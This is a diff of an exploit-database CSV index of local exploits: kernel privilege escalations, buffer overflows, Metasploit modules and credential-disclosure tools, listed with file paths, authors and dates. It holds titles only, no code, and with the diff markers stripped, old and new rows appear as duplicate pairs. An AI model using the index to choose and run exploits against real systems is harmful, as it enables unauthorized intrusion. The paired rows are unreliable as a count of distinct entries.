40348,platforms/win_x86-64/local/40348.py,"Dropbox Desktop Client 9.4.49 (x64) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",win_x86-64,local,0
21577,platforms/hp-ux/local/21577.c,"HP CIFS/9000 Server A.01.05/A.01.06 - Buffer Overflow",2002-11-06,watercloud,hp-ux,local,0
21583,platforms/linux/local/21583.pl,"Mandrake 7/8/9 / RedHat 6.x/7 Bonobo EFSTool - Commandline Argument Buffer Overflow (1)",2002-06-29,clorox,linux,local,0
21584,platforms/linux/local/21584.pl,"Mandrake 7/8/9 / RedHat 6.x/7 Bonobo EFSTool - Commandline Argument Buffer Overflow (2)",2002-06-29,"andrea lisci",linux,local,0
@ -7610,7 +7610,7 @@ id,file,description,date,author,platform,type,port
21669,platforms/bsd/local/21669.pl,"FreeBSD 4.x / NetBSD 1.4.x/1.5.x/1.6 / OpenBSD 3 - pppd Arbitrary File Permission Modification Race Condition",2002-07-29,"Sebastian Krahmer",bsd,local,0
40362,platforms/windows/local/40362.txt,"Battle.Net 1.5.0.7963 - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,windows,local,0
40365,platforms/windows/local/40365.txt,"Zapya Desktop 1.803 - 'ZapyaService.exe' Privilege Escalation",2016-09-13,"Arash Khazaei",windows,local,0
40429,platforms/windows/local/40429.cs,"Microsoft Windows 10 10586 (x32/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local,0
40429,platforms/windows/local/40429.cs,"Microsoft Windows 10 10586 (x86/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local,0
21674,platforms/linux/local/21674.c,"William Deich Super 3.x - SysLog Format String",2002-07-31,gobbles,linux,local,0
21683,platforms/linux/local/21683.c,"qmailadmin 1.0.x - Local Buffer Overflow",2002-08-06,"Thomas Cannon",linux,local,0
21684,platforms/windows/local/21684.c,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (1)",2002-08-06,sectroyer,windows,local,0
@ -7703,7 +7703,7 @@ id,file,description,date,author,platform,type,port
22326,platforms/linux/local/22326.c,"File 3.x - Utility Local Memory Allocation",2003-03-06,CrZ,linux,local,0
22329,platforms/windows/local/22329.c,"CoffeeCup Software Password Wizard 4.0 - HTML Source Password Retrieval",2003-03-03,THR,windows,local,0
22335,platforms/unix/local/22335.pl,"Tower Toppler 0.99.1 - Display Variable Local Buffer Overflow",2002-03-02,"Knud Erik Hojgaard",unix,local,0
22340,platforms/linux/local/22340.txt,"MySQL 3.23.x - mysqld Privilege Escalation",2003-03-08,bugsman@libero.it,linux,local,0
22340,platforms/linux/local/22340.txt,"MySQL 3.23.x - 'mysqld' Privilege Escalation",2003-03-08,bugsman@libero.it,linux,local,0
22344,platforms/linux/local/22344.txt,"Man Program 1.5 - Unsafe Return Value Command Execution",2003-03-11,"Jack Lloyd",linux,local,0
22354,platforms/windows/local/22354.c,"Microsoft Windows 2000 - Help Facility .CNT File :Link Buffer Overflow",2003-03-09,s0h,windows,local,0
22362,platforms/linux/local/22362.c,"Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Privilege Escalation (1)",2003-03-17,anszom@v-lo.krakow.pl,linux,local,0
@ -7856,8 +7856,8 @@ id,file,description,date,author,platform,type,port
23738,platforms/linux/local/23738.c,"LGames LBreakout2 2.2.2 - Multiple Environment Variable Buffer Overflow Vulnerabilities",2004-02-21,Li0n7,linux,local,0
23739,platforms/windows/local/23739.txt,"Dell TrueMobile 1300 WLAN System 3.10.39.0 Tray Applet - Privilege Escalation",2004-02-22,"Ian Vitek",windows,local,0
23740,platforms/linux/local/23740.c,"Samhain Labs 1.x - HSFTP Remote Format String",2004-02-23,priest@priestmaster.org,linux,local,0
23743,platforms/linux/local/23743.txt,"Platform Load Sharing Facility 4/5/6 - EAuth Privilege Escalation",2003-02-23,"Tomasz Grabowski",linux,local,0
23759,platforms/linux/local/23759.pl,"MTools 3.9.x - MFormat Privilege Escalation",2004-02-25,"Sebastian Krahmer",linux,local,0
23743,platforms/linux/local/23743.txt,"Platform Load Sharing Facility 4/5/6 - 'EAuth' Privilege Escalation",2003-02-23,"Tomasz Grabowski",linux,local,0
23759,platforms/linux/local/23759.pl,"MTools 3.9.x - 'MFormat' Privilege Escalation",2004-02-25,"Sebastian Krahmer",linux,local,0
23783,platforms/windows/local/23783.rb,"BlazeDVD 6.1 - PLF Exploit DEP/ASLR Bypass (Metasploit)",2012-12-31,"Craig Freyman",windows,local,0
23838,platforms/aix/local/23838.pl,"GNU Make For IBM AIX 4.3.3 - CC Path Local Buffer Overflow",2003-05-30,watercloud,aix,local,0
23840,platforms/aix/local/23840.pl,"AIX 4.3.3/5.x - Getlvcb Command Line Argument Buffer Overflow (1)",2003-05-30,watercloud,aix,local,0
@ -7901,7 +7901,7 @@ id,file,description,date,author,platform,type,port
24458,platforms/linux/local/24458.txt,"Oracle Automated Service Manager 1.3 - Installation Privilege Escalation",2013-02-05,"Larry W. Cashdollar",linux,local,0
24459,platforms/linux/local/24459.sh,"Linux Kernel 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure",2013-02-05,vladz,linux,local,0
24505,platforms/windows/local/24505.py,"Photodex ProShow Producer 5.0.3297 - '.pxs' Memory Corruption",2013-02-15,"Julien Ahrens",windows,local,0
24555,platforms/linux/local/24555.c,"Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Privilege Escalation (1)",2013-02-27,sd,linux,local,0
24555,platforms/lin_x86-64/local/24555.c,"Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Privilege Escalation (1)",2013-02-27,sd,lin_x86-64,local,0
24570,platforms/linux/local/24570.txt,"QNX PPPoEd 2.4/4.25/6.2 - Path Environment Variable Local Command Execution",2004-09-03,"Julio Cesar Fort",linux,local,0
24578,platforms/osx/local/24578.rb,"Tunnelblick - Setuid Privilege Escalation (Metasploit)",2013-03-05,Metasploit,osx,local,0
24579,platforms/osx/local/24579.rb,"Viscosity - setuid-set ViscosityHelper Privilege Escalation (Metasploit)",2013-03-05,Metasploit,osx,local,0
@ -7935,7 +7935,7 @@ id,file,description,date,author,platform,type,port
25106,platforms/linux/local/25106.c,"Typespeed 0.4.1 - Local Format String",2005-02-16,"Ulf Harnhammar",linux,local,0
25130,platforms/windows/local/25130.py,"FuzeZip 1.0.0.131625 - Buffer Overflow (SEH)",2013-05-01,RealPentesting,windows,local,0
25131,platforms/windows/local/25131.py,"WinArchiver 3.2 - Buffer Overflow (SEH)",2013-05-01,RealPentesting,windows,local,0
25134,platforms/linux/local/25134.c,"sudo 1.8.0 < 1.8.3p1 (sudo_debug) - Privilege Escalation + glibc FORTIFY_SOURCE Bypass",2013-05-01,aeon,linux,local,0
25134,platforms/linux/local/25134.c,"sudo 1.8.0 < 1.8.3p1 (sudo_debug) - glibc FORTIFY_SOURCE Bypass + Privilege Escalation",2013-05-01,aeon,linux,local,0
25141,platforms/windows/local/25141.rb,"AudioCoder 0.8.18 - Buffer Overflow (SEH)",2013-05-02,metacom,windows,local,0
25202,platforms/linux/local/25202.c,"Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Local Integer Overflow Privilege Escalation (1)",2005-03-09,sd,linux,local,0
25204,platforms/windows/local/25204.py,"ABBS Audio Media Player 3.1 - '.lst' Buffer Overflow",2013-05-04,"Julien Ahrens",windows,local,0
@ -7973,7 +7973,7 @@ id,file,description,date,author,platform,type,port
25961,platforms/windows/local/25961.c,"SoftiaCom wMailServer 1.0 - Local Information Disclosure",2005-07-09,fRoGGz,windows,local,0
25993,platforms/linux/local/25993.sh,"Skype Technologies Skype 0.92/1.0/1.1 - Insecure Temporary File Creation",2005-07-18,"Giovanni Delvecchio",linux,local,0
26100,platforms/linux/local/26100.sh,"Lantronix Secure Console Server SCS820/SCS1620 - Multiple Local Vulnerabilities",2005-08-05,c0ntex,linux,local,0
26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Privilege Escalation (2)",2013-06-11,"Andrea Bittau",linux,local,0
26131,platforms/lin_x86-64/local/26131.c,"Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Privilege Escalation (2)",2013-06-11,"Andrea Bittau",lin_x86-64,local,0
26185,platforms/osx/local/26185.txt,"Apple Mac OSX 10.4 - dsidentity Directory Services Account Creation and Deletion",2005-08-15,"Neil Archibald",osx,local,0
26195,platforms/linux/local/26195.txt,"QNX RTOS 6.1/6.3 - InputTrap Local Arbitrary File Disclosure",2005-08-24,"Julio Cesar Fort",linux,local,0
26218,platforms/linux/local/26218.txt,"Frox 0.7.18 - Arbitrary Configuration File Access",2005-09-01,rotor,linux,local,0
@ -8149,14 +8149,14 @@ id,file,description,date,author,platform,type,port
30780,platforms/linux/local/30780.txt,"ISPmanager 4.2.15 - Responder Privilege Escalation",2007-11-20,"Andrew Christensen",linux,local,0
30788,platforms/windows/local/30788.rb,"IcoFX - Stack Buffer Overflow (Metasploit)",2014-01-07,Metasploit,windows,local,0
30789,platforms/windows/local/30789.rb,"IBM Forms Viewer - Unicode Buffer Overflow (Metasploit)",2014-01-07,Metasploit,windows,local,0
30839,platforms/linux/local/30839.c,"ZABBIX 1.1.4/1.4.2 - daemon_start Privilege Escalation",2007-12-03,"Bas van Schaik",linux,local,0
30839,platforms/linux/local/30839.c,"ZABBIX 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation",2007-12-03,"Bas van Schaik",linux,local,0
30999,platforms/windows/local/30999.txt,"Creative Ensoniq PCI ES1371 WDM Driver 5.1.3612 - Privilege Escalation",2008-01-07,"Ruben Santamarta",windows,local,0
31036,platforms/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules - Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",windows,local,0
31090,platforms/windows/local/31090.txt,"MuPDF 1.3 - Stack Based Buffer Overflow in xps_parse_color()",2014-01-20,"Jean-Jamil Khalife",windows,local,0
31151,platforms/linux/local/31151.c,"GKrellM GKrellWeather 0.2.7 Plugin - Local Stack Based Buffer Overflow",2008-02-12,forensec,linux,local,0
31182,platforms/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",windows,local,0
31346,platforms/linux/local/31346.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write Exploit (2)",2014-02-02,saelo,linux,local,0
31347,platforms/linux/local/31347.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Privilege Escalation (3)",2014-02-02,rebel,linux,local,0
31347,platforms/lin_x86/local/31347.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Privilege Escalation (3)",2014-02-02,rebel,lin_x86,local,0
31386,platforms/windows/local/31386.rb,"Adrenalin Player 2.2.5.3 - '.m3u' Buffer Overflow (SEH) ASLR + DEP Bypass",2014-02-04,"Muhamad Fadzil Ramli",windows,local,0
31460,platforms/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Privilege Escalation",2014-02-06,LiquidWorm,windows,local,0
31524,platforms/windows/local/31524.rb,"Publish-It 3.6d - '.pui' Buffer Overflow (SEH)",2014-02-08,"Muhamad Fadzil Ramli",windows,local,0
@ -8173,7 +8173,7 @@ id,file,description,date,author,platform,type,port
31937,platforms/php/local/31937.txt,"PHP 5.2.6 - chdir Function http URL Argument Safe_mode Restriction Bypass",2008-06-18,"Maksymilian Arciemowicz",php,local,0
31940,platforms/osx/local/31940.txt,"Apple Mac OSX 10.x - Applescript ARDAgent Shell Privilege Escalation",2008-06-19,anonymous,osx,local,0
31959,platforms/linux/local/31959.txt,"Perl - 'rmtree()' Function Local Insecure Permissions",2008-06-23,"Frans Pop",linux,local,0
40349,platforms/windows/local/40349.py,"LogMeIn Client 1.3.2462 (x64) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",windows,local,0
40349,platforms/win_x86-64/local/40349.py,"LogMeIn Client 1.3.2462 (x64) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",win_x86-64,local,0
31972,platforms/windows/local/31972.py,"Gold MP4 Player 3.3 - Buffer Overflow (SEH)",2014-02-28,metacom,windows,local,0
31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 - 'Settings.ini' Buffer Overflow (SEH) (Metasploit)",2014-02-28,Metasploit,windows,local,0
31991,platforms/windows/local/31991.rb,"VCDGear 3.50 - '.cue' Stack Buffer Overflow",2014-02-28,Provensec,windows,local,0
@ -8199,7 +8199,7 @@ id,file,description,date,author,platform,type,port
32693,platforms/php/local/32693.php,"suPHP 0.7 - 'suPHP_ConfigPath' Safe Mode Restriction-Bypass",2008-12-31,Mr.SaFa7,php,local,0
32700,platforms/linux/local/32700.rb,"ibstat $PATH - Privilege Escalation (Metasploit)",2014-04-04,Metasploit,linux,local,0
32737,platforms/windows/local/32737.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow Jump ESP",2014-04-08,"Deepak Rathore",windows,local,0
32751,platforms/linux/local/32751.c,"Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation",2009-01-23,"Chris Evans",linux,local,0
32751,platforms/lin_x86-64/local/32751.c,"Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation",2009-01-23,"Chris Evans",lin_x86-64,local,0
32752,platforms/windows/local/32752.rb,"WinRAR - Filename Spoofing (Metasploit)",2014-04-08,Metasploit,windows,local,0
32771,platforms/windows/local/32771.txt,"Multiple Kaspersky Products 'klim5.sys' - Privilege Escalation",2009-02-02,"Ruben Santamarta",windows,local,0
32778,platforms/windows/local/32778.pl,"Password Door 8.4 - Local Buffer Overflow",2009-02-05,b3hz4d,windows,local,0
@ -8224,7 +8224,7 @@ id,file,description,date,author,platform,type,port
33069,platforms/windows/local/33069.rb,"Wireshark 1.8.12/1.10.5 - wiretap/mpeg.c Stack Buffer Overflow (Metasploit)",2014-04-28,Metasploit,windows,local,0
33145,platforms/linux/local/33145.c,"PHP Fuzzer Framework - Default Location Insecure Temporary File Creation",2009-08-03,"Melissa Elliott",linux,local,0
33161,platforms/php/local/33161.php,"PHP 5.3 - 'mail.log' Configuration Option 'open_basedir' Restriction Bypass",2009-08-10,"Maksymilian Arciemowicz",php,local,0
33213,platforms/windows/local/33213.rb,"Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit)",2014-05-06,Metasploit,windows,local,0
33213,platforms/win_x86/local/33213.rb,"Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit)",2014-05-06,Metasploit,win_x86,local,0
33229,platforms/bsd/local/33229.c,"NetBSD 5.0.1 - 'IRET' General Protection Fault Handling Privilege Escalation",2009-09-16,"Tavis Ormandy",bsd,local,0
33255,platforms/linux/local/33255.txt,"Xen 3.x - pygrub Local Authentication Bypass",2009-09-25,"Jan Lieskovsky",linux,local,0
33321,platforms/linux/local/33321.c,"Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Privilege Escalation (1)",2009-11-03,"teach & xipe",linux,local,0
@ -8236,20 +8236,20 @@ id,file,description,date,author,platform,type,port
33395,platforms/linux/local/33395.txt,"Linux Kernel 2.6.x - Ext4 'move extents' ioctl Privilege Escalation",2009-11-09,"Akira Fujita",linux,local,0
40823,platforms/windows/local/40823.txt,"Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (1)",2016-11-24,IOactive,windows,local,0
33508,platforms/linux/local/33508.txt,"GNU Bash 4.0 - 'ls' Control Character Command Injection",2010-01-13,"Eric Piel",linux,local,0
33516,platforms/linux/local/33516.c,"Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0
33516,platforms/lin_x86-64/local/33516.c,"Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Privilege Escalation",2014-05-26,"Matthew Daley",lin_x86-64,local,0
33572,platforms/unix/local/33572.txt,"IBM DB2 - 'REPEAT()' Heap Buffer Overflow",2010-01-27,"Evgeny Legerov",unix,local,0
33576,platforms/linux/local/33576.txt,"Battery Life Toolkit 1.0.9 - 'bltk_sudo' Privilege Escalation",2010-01-28,"Matthew Garrett",linux,local,0
33589,platforms/linux/local/33589.c,"Linux Kernel 3.2.0-23 / 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3)",2014-05-31,"Vitaly Nikolenko",linux,local,0
33589,platforms/lin_x86-64/local/33589.c,"Linux Kernel 3.2.0-23 / 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3)",2014-05-31,"Vitaly Nikolenko",lin_x86-64,local,0
33523,platforms/linux/local/33523.c,"Linux Kernel < 2.6.28 - 'fasync_helper()' Privilege Escalation",2009-12-16,"Tavis Ormandy",linux,local,0
33604,platforms/linux/local/33604.sh,"SystemTap 1.0/1.1 - '__get_argv()' and '__get_compat_argv()' Local Memory Corruption",2010-02-05,"Josh Stone",linux,local,0
33614,platforms/linux/local/33614.c,"dbus-glib pam_fprintd - Privilege Escalation",2014-06-02,"Sebastian Krahmer",linux,local,0
33623,platforms/linux/local/33623.txt,"Accellion Secure File Transfer Appliance - Multiple Command Restriction Weakness Privilege Escalation",2010-02-10,"Tim Brown",linux,local,0
33725,platforms/aix/local/33725.txt,"IBM AIX 6.1.8 libodm - Arbitrary File Write",2014-06-12,Portcullis,aix,local,0
40342,platforms/windows/local/40342.py,"TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure",2016-09-07,"Alexander Korznikov",windows,local,0
40342,platforms/win_x86-64/local/40342.py,"TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure",2016-09-07,"Alexander Korznikov",win_x86-64,local,0
33791,platforms/arm/local/33791.rb,"Adobe Reader for Android - addJavascriptInterface Exploit (Metasploit)",2014-06-17,Metasploit,arm,local,0
33799,platforms/solaris/local/33799.sh,"Sun Connection Update Manager for Solaris - Multiple Insecure Temporary File Creation Vulnerabilities",2010-03-24,"Larry W. Cashdollar",solaris,local,0
33808,platforms/linux/local/33808.c,"Docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
33824,platforms/linux/local/33824.c,"Linux Kernel 3.13 - Privilege Escalation PoC (SGID)",2014-06-21,"Vitaly Nikolenko",linux,local,0
33824,platforms/linux/local/33824.c,"Linux Kernel 3.13 - (SGID) Privilege Escalation (PoC)",2014-06-21,"Vitaly Nikolenko",linux,local,0
33892,platforms/windows/local/33892.rb,"Microsoft .NET Deployment Service - IE Sandbox Escape (MS14-009) (Metasploit)",2014-06-27,Metasploit,windows,local,0
33893,platforms/windows/local/33893.rb,"Microsoft Registry Symlink - IE Sandbox Escape (MS13-097) (Metasploit)",2014-06-27,Metasploit,windows,local,0
33899,platforms/linux/local/33899.txt,"Chkrootkit 0.49 - Privilege Escalation",2014-06-28,"Thomas Stangner",linux,local,0
@ -8298,7 +8298,7 @@ id,file,description,date,author,platform,type,port
35177,platforms/windows/local/35177.py,"i-FTP 2.20 - Buffer Overflow SEH Exploit",2014-11-06,metacom,windows,local,0
35189,platforms/windows/local/35189.c,"SafeGuard PrivateDisk 2.0/2.3 - 'privatediskm.sys' Multiple Local Security Bypass Vulnerabilities",2008-03-05,mu-b,windows,local,0
35216,platforms/windows/local/35216.py,"Microsoft Office 2007 / 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0
35234,platforms/linux/local/35234.py,"OSSEC 2.8 - hosts.deny Privilege Escalation",2014-11-14,skynet-13,linux,local,0
35234,platforms/linux/local/35234.py,"OSSEC 2.8 - 'hosts.deny' Privilege Escalation",2014-11-14,skynet-13,linux,local,0
35235,platforms/windows/local/35235.rb,"Microsoft Windows - OLE Package Manager Code Execution (via Python) (MS14-064) (Metasploit)",2014-11-14,Metasploit,windows,local,0
35236,platforms/windows/local/35236.rb,"Microsoft Windows - OLE Package Manager Code Execution (MS14-064) (Metasploit)",2014-11-14,Metasploit,windows,local,0
35322,platforms/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local,0
@ -8389,7 +8389,7 @@ id,file,description,date,author,platform,type,port
36837,platforms/windows/local/36837.rb,"Apple iTunes 10.6.1.7 - '.pls' Title Buffer Overflow",2015-04-27,"Fady Mohammed Osman",windows,local,0
36841,platforms/windows/local/36841.py,"UniPDF 1.2 - 'xml' Buffer Overflow Crash (PoC)",2015-04-27,"Avinash Thapa",windows,local,0
37065,platforms/windows/local/37065.txt,"Comodo GeekBuddy < 4.18.121 - Privilege Escalation",2015-05-20,"Jeremy Brown",windows,local,0
36855,platforms/linux/local/36855.py,"Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition",2015-04-29,"Ben Sheppard",linux,local,0
36855,platforms/linux/local/36855.py,"Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition Privilege Escalation",2015-04-29,"Ben Sheppard",linux,local,0
36859,platforms/windows/local/36859.txt,"Foxit Reader PDF 7.1.3.320 - Parsing Memory Corruption",2015-04-29,"Francis Provencher",windows,local,0
36887,platforms/linux/local/36887.py,"GNOME NetworkManager 0.x - Local Arbitrary File Access",2012-02-29,Ludwig,linux,local,0
36909,platforms/windows/local/36909.rb,"RM Downloader 2.7.5.400 - Local Buffer Overflow (Metasploit)",2015-05-04,"TUNISIAN CYBER",windows,local,0
@ -8428,8 +8428,8 @@ id,file,description,date,author,platform,type,port
37825,platforms/osx/local/37825.txt,"Apple Mac OSX 10.10.5 - XNU Privilege Escalation",2015-08-18,kpwn,osx,local,0
37710,platforms/linux/local/37710.txt,"Sudo 1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0
37716,platforms/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",windows,local,0
37722,platforms/linux/local/37722.c,"Linux espfix64 - Privilege Escalation (Nested NMIs Interrupting)",2015-08-05,"Andrew Lutomirski",linux,local,0
37724,platforms/linux/local/37724.asm,"Linux (x86) - Memory Sinkhole Privilege Escalation (PoC)",2015-08-07,"Christopher Domas",linux,local,0
37722,platforms/lin_x86-64/local/37722.c,"Linux espfix64 - (Nested NMIs Interrupting) Privilege Escalation",2015-08-05,"Andrew Lutomirski",lin_x86-64,local,0
37724,platforms/lin_x86/local/37724.asm,"Linux (x86) - Memory Sinkhole Privilege Escalation (PoC)",2015-08-07,"Christopher Domas",lin_x86,local,0
37730,platforms/windows/local/37730.py,"Tomabo MP4 Player 3.11.3 - '.m3u' Buffer Overflow (SEH)",2015-08-07,"Saeid Atabaki",windows,local,0
37732,platforms/win_x86/local/37732.c,"Microsoft Windows XP SP3 x86 / 2003 SP2 (x86) - 'NDProxy' Privilege Escalation (MS14-002)",2015-08-07,"Tomislav Paskalev",win_x86,local,0
38106,platforms/aix/local/38106.txt,"IBM AIX High Availability Cluster Multiprocessing (HACMP) - Privilege Escalation",2015-09-08,"Kristian Erik Hermansen",aix,local,0
@ -8519,7 +8519,7 @@ id,file,description,date,author,platform,type,port
38775,platforms/linux/local/38775.rb,"Chkrootkit - Privilege Escalation (Metasploit)",2015-11-20,Metasploit,linux,local,0
38792,platforms/windows/local/38792.txt,"Nvidia Stereoscopic 3D Driver Service 7.17.13.5382 - Arbitrary Run Key Creation",2015-11-23,"Google Security Research",windows,local,0
38817,platforms/linux/local/38817.txt,"Poppler 0.14.3 - '/utils/pdfseparate.cc' Local Format String",2013-10-26,"Daniel Kahn Gillmor",linux,local,0
38832,platforms/linux/local/38832.py,"RHEL 7.0/7.1 - abrt/sosreport Privilege Escalation",2015-12-01,rebel,linux,local,0
38832,platforms/linux/local/38832.py,"RHEL 7.0/7.1 - 'abrt/sosreport' Privilege Escalation",2015-12-01,rebel,linux,local,0
38835,platforms/multiple/local/38835.py,"Centos 7.1 / Fedora 22 - abrt Privilege Escalation",2015-12-01,rebel,multiple,local,0
38847,platforms/windows/local/38847.py,"Acunetix WVS 10 - Privilege Escalation",2015-12-02,"Daniele Linguaglossa",windows,local,0
38871,platforms/windows/local/38871.txt,"Cyclope Employee Surveillance 8.6.1 - Insecure File Permissions",2015-12-06,loneferret,windows,local,0
@ -8549,7 +8549,7 @@ id,file,description,date,author,platform,type,port
40003,platforms/linux/local/40003.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Privilege Escalation (2)",2016-01-19,"Federico Bento",linux,local,0
39284,platforms/windows/local/39284.txt,"Oracle - HtmlConverter.exe Buffer Overflow",2016-01-21,hyp3rlinx,windows,local,0
39285,platforms/linux/local/39285.py,"xWPE 1.5.30a-2.1 - Local Buffer Overflow",2016-01-21,"Juan Sacco",linux,local,0
40337,platforms/windows/local/40337.py,"MySQL 5.5.45 (x64) - Local Credentials Disclosure",2016-09-05,"Yakir Wizman",windows,local,0
40337,platforms/win_x86-64/local/40337.py,"MySQL 5.5.45 (x64) - Local Credentials Disclosure",2016-09-05,"Yakir Wizman",win_x86-64,local,0
39310,platforms/windows/local/39310.txt,"Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
39311,platforms/windows/local/39311.txt,"Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
40360,platforms/linux/local/40360.txt,"MySQL / MariaDB / PerconaDB 5.5.51 / 5.6.32 / 5.7.14 - Code Execution / Privilege Escalation",2016-09-12,"Dawid Golunski",linux,local,3306
@ -8597,7 +8597,7 @@ id,file,description,date,author,platform,type,port
39764,platforms/linux/local/39764.py,"TRN Threaded USENET News Reader 3.6-23 - Local Stack Based Overflow",2016-05-04,"Juan Sacco",linux,local,0
39769,platforms/linux/local/39769.txt,"Zabbix Agent 3.0.1 - mysql.size Shell Command Injection",2016-05-04,"Timo Lindfors",linux,local,0
39771,platforms/linux/local/39771.txt,"Linux Kernel (Ubuntu 14.04.3) - 'perf_event_open()' Can Race with execve() (Access /etc/shadow)",2016-05-04,"Google Security Research",linux,local,0
39772,platforms/linux/local/39772.txt,"Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) Privilege Escalation",2016-05-04,"Google Security Research",linux,local,0
39772,platforms/linux/local/39772.txt,"Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation",2016-05-04,"Google Security Research",linux,local,0
39786,platforms/windows/local/39786.txt,"Certec EDV atvise SCADA Server 2.5.9 - Privilege Escalation",2016-05-09,LiquidWorm,windows,local,0
39788,platforms/windows/local/39788.txt,"Microsoft Windows 7 - 'WebDAV' Privilege Escalation (MS16-016) (2)",2016-05-09,hex0r,windows,local,0
39791,platforms/multiple/local/39791.rb,"ImageMagick 6.9.3-9 / 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick) (Metasploit)",2016-05-09,Metasploit,multiple,local,0
@ -8620,7 +8620,7 @@ id,file,description,date,author,platform,type,port
39954,platforms/windows/local/39954.txt,"AdobeUpdateService 3.6.0.248 - Unquoted Service Path Privilege Escalation",2016-06-15,"Cyril Vallicari",windows,local,0
40054,platforms/linux/local/40054.c,"Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation",2016-07-04,halfdog,linux,local,0
39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (Metasploit)",2016-06-20,s0nk3y,windows,local,0
39984,platforms/windows/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - '0PatchServicex64.exe' Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,windows,local,0
39984,platforms/win_x86-64/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - '0PatchServicex64.exe' Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,win_x86-64,local,0
39992,platforms/linux/local/39992.txt,"Linux - ecryptfs and /proc/$pid/environ Privilege Escalation",2016-06-21,"Google Security Research",linux,local,0
40017,platforms/windows/local/40017.py,"Mediacoder 0.8.43.5830 - '.m3u' Buffer Overflow SEH Exploit",2016-06-27,"Sibusiso Sishi",windows,local,0
40018,platforms/windows/local/40018.py,"VUPlayer 2.49 - '.m3u' Buffer Overflow (Win 7 DEP Bypass)",2016-06-27,secfigo,windows,local,0
@ -8630,7 +8630,7 @@ id,file,description,date,author,platform,type,port
40039,platforms/win_x86/local/40039.cpp,"Microsoft Windows 7 SP1 (x86) - Privilege Escalation (MS16-014)",2016-06-29,blomster81,win_x86,local,0
40040,platforms/windows/local/40040.txt,"Lenovo ThinkPad - System Management Mode Arbitrary Code Execution",2016-06-29,Cr4sh,windows,local,0
40043,platforms/windows/local/40043.py,"Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution",2016-06-29,"Rémi ROCHER",windows,local,0
40049,platforms/linux/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation",2016-07-03,vnik,linux,local,0
